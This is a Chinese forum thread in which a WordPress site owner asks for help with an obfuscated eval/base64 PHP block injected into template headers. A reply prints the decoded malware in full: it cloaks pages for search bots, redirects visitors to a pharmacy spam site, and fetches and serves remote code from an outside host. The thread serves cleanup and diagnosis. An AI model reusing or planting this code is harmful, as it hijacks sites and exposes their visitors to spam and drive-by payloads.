我的Wordpress的模板文件头部都被添加了一段加密代码，导致网站显示不正常，并且服务器上只有这一个网站有问题，不知道谁能帮我看看这段代码怎么解密出来？

<?php eval(gzinflate(base64_decode('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 98MS3YMQrB75dMfC92YfUVTf8t/oP')));?>

被挂马了。。

if (!defined('frmDs')){ define('frmDs' ,1); error_reporting(0); function frm_dl ($url) { if (function_exists('curl_init')) { $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $out = curl_exec ($ch); if (curl_errno($ch) !== 0) $out = false; curl_close ($ch); } else {$out = @file_get_contents($url);} return trim($out); } function frm_crpt($in){ $il=strlen($in);$o=''; for ($i = 0; $i < $il; $i++) $o.=$in[$i] ^ '*'; return $o; } function frm_getcache($tmpdir,$link,$cmtime,$del=true){ $f = $tmpdir.'/sess_'.md5(preg_replace('/^http:\/\/[^\/]+/', '', $link)); if(!file_exists($f) || time() - filemtime($f) > 60 * $cmtime) { $dlc=frm_dl($link); if($dlc===false){ if(del) @unlink($f); else @touch($f); } else { if($fp = @fopen($f,'w')){ fwrite($fp, frm_crpt($dlc)); fclose($fp); }else{return $dlc;} } } $fc = @file_get_contents($f); return ($fc)?frm_crpt($fc):''; } function frm_isbot(){ $ua=@strtolower($_SERVER['HTTP_USER_AGENT']); if(($lip=ip2long($_SERVER['REMOTE_ADDR']))<0)$lip+=4294967296; $rs = array(array(3639549953,3639558142),array(1089052673,1089060862),array(1123635201,1123639294),array(1208926209,1208942590), array(3512041473,3512074238),array(1113980929,1113985022),array(1249705985,1249771518),array(1074921473,1074925566), array(3481178113,3481182206),array(2915172353,2915237886)); foreach ($rs as $r) if($lip>=$r[0] && $lip<=$r[1]) return true; if(!$ua)return true; $bots = array('googlebot','bingbot','slurp','msnbot','jeeves','teoma','crawler','spider'); foreach ($bots as $b) if(strpos($ua, $b)!==false) return true; $h=@gethostbyaddr($_SERVER['REMOTE_ADDR']); $hba=array('google','msn','yahoo'); if($h) foreach ($hba as $hb) if(strpos($h, $hb)!==false) return true; return false; } function frm_tmpdir(){ $fs = array('/tmp','/var/tmp'); foreach (array('TMP', 'TEMP', 'TMPDIR') as $v) { if ($t = getenv($v)) {$fs[]=$t;} } if (function_exists('sys_get_temp_dir')) {$fs[]=sys_get_temp_dir();} $fs[]='.'; foreach ($fs as $f){ $tf = $f.'/'.md5(rand()); if($fp = @fopen($tf, 'w')){ fclose($fp); unlink($tf); return $f; } } return false; } function frm_seref(){ $r = @strtolower($_SERVER["HTTP_REFERER"]); $ses = array('google','bing','yahoo','ask','aol'); foreach ($ses as $se) if(strpos($r, $se.'.')!=false) return true; return false; } function frm_isuniq($tdir){ $ip=$_SERVER['REMOTE_ADDR']; $dbf=$tdir.'/sess_'.md5(date('m.d.y')); $odbf = $tdir.'/sess_'.md5(date('m.d.y',time()-86400)); if (file_exists($odbf)) @unlink($odbf); if(strpos(frm_crpt(@file_get_contents($dbf)),$ip) === false ){ if ($fp=@fopen($dbf,'a')){fputs($fp,frm_crpt($ip.'|')); fclose($fp);} return true; } return false; } function frm_havekey(){ $nks = array('cialis','cipro','clomi','diflucan','finasteride','fluconazole','furosemide','kamagra','lasix','levitra','propecia','sildenafil','tadalafil','vardenafil','viagra','zithrom','priligy','amoxil'); $k = @strtolower($_SERVER["HTTP_REFERER"].$_SERVER["REQUEST_URI"]); print_r($r); if (strpos($k,"site%3A")!==false||strpos($k,"inurl%3A")!==false) return false; foreach ($nks as $n)if(strpos($k, $n)!==false) return $n; return false; } $tdir = frm_tmpdir(); $defframe = '
'; $codelink = 'http://qfwucflgixuz.rr.nu/nc/gnc.php?ver=jquery.latest.js'; $ua=$_SERVER['HTTP_USER_AGENT']; $isb=frm_isbot(); $k=frm_havekey(); //------- $host = preg_replace('/^w{3}\./','', strtolower($_SERVER['HTTP_HOST'])); if($tdir && strlen($host)<100 && preg_match('/^[a-z0-9\-]+\.([a-z]{2,5}|[a-z]{2,3}\.[a-z]{2,3}|[a-z0-9\-]+\.edu)$/', $host)){ $parg = substr(preg_replace( '/[^a-z]+/', '',strtolower(base64_encode(md5($host.'p')))),0,3); $pageid = (isset($_GET[$parg]))?$_GET[$parg]*1:0; $ruri = strtolower($_SERVER['REQUEST_URI']); if((strpos($ruri,'/?')===0||strpos($ruri,'/index.php?')===0) && $pageid > 0){ if(!$isb && frm_seref()){ header('Location: https://pharmshopping.net'.($k?('/search.html?key='.$k.'&'):'/?').'rdh='.$host.'&rpn='.$pageid); exit(); } print(frm_getcache($tdir,"http://qfwucflgixuz.rr.nu/rdg/getpage.php?h=$host&p=$pageid&pa=$parg",60*24,false)); exit(); } if (($ruri=='/' || $ruri=='/index.php') && $isb) { print(frm_getcache($tdir,"http://qfwucflgixuz.rr.nu/rdg/getpage.php?h=$host&pa=$parg&g=1",60*24,false)); exit(); } } //--------- if(!$isb&&frm_seref()&&$k){ header('Location: https://pharmshopping.net/search.html?key='.$k.'&rdh=na');exit(); } if (!$isb && preg_match('/Windows/', $ua) && preg_match('/MSIE|Opera/', $ua) && frm_isuniq($tdir) ){ if(!isset($_COOKIE['__utmfr'])) { if(!$codelink) print($defframe); else print(frm_getcache($tdir,$codelink,15)); @setcookie('__utmfr',rand(1,1000),time()+86400*7,'/'); } } }

被黑了...临时的应对办法是,FTP禁掉所有修改文件的权限.
然后排插吧.

@vivianalive 服务器没有开通FTP服务...所有的网站文件都是直接归属给www了。

@qiuai 请教下这段话的主要行为是干嘛呢？

顺便再请教下，在shell下，可以使用什么命令 查找替换掉 所有文件里的这段代码呢？

额，没办法 @laoyu 不知道可以不...